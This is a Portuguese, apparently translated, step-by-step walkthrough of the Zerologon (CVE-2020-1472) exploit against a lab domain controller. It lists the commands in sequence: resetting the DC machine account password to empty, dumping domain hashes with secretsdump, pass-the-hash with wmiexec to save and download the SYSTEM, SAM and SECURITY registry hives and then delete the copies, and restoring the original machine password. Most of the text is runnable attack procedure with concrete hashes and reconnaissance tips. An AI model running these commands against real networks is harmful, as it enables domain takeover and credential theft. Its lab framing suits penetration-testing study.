
Exploração para CVE-2020-1472 (Zerologon) que redefine a senha da conta de máquina do controlador de domínio, permitindo extração de credenciais e escalonamento de privilégios para administrador de domínio.
@toc
O princípio é relativamente complexo. Se tiver interesse, pode consultar o artigo no link abaixo: https://www.freebuf.com/articles/system/249860.html
É necessário usar o arquivo https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py para substituir o arquivo nrpc local. O caminho de armazenamento do arquivo nrpc local é: C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py
python cve-2020-1472-exploit.py 机器账户名 ip
E descubra que a senha da conta de máquina já foi zerada; 31dc... representa senha vazia.

Formas de obter a conta de máquina do alvo, ou seja, o nome NetBIOS:
- net view
O nome deste servidor com $ é o nome da máquina, por exemplo, lisi$ ou yukong$.
- nbtstat -A ip
Existem muitas maneiras de determinar o IP do controlador de domínio, por exemplo:
- Verificar os hosts com a porta 53 aberta
- No net time, a resposta retorna o nome do host do controlador de domínio; basta usar ping
- No comando systeminfo, verificar o valor do domínio e fazer ping para obter o IP do controlador de domínio
- Verificar o DNS do próprio host
python secretsdump.py test.com/[email protected] -no-pass
Descobre-se que, neste momento, é possível usar a conta de máquina com senha vazia para ler o hash dos usuários no controlador de domínio.
python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/[email protected] reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save
get system.save get sam.save get security.save
del /f system.save del /f sam.save del /f security.save
exit
Após a execução, é possível encontrar os arquivos baixados na pasta onde o script wmiexec está localizado:

python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/[email protected] -use-vss Este comando falhou ao ser executado
python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Salve a senha no círculo vermelho. Esta é a senha anterior da máquina, ou seja, aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a.
python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a

python secretsdump.py test.com/administrator:[email protected] -just-dc-user yukong$
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/[email protected] -just-dc-user yukong$
Verifica-se que a restauração foi bem-sucedida.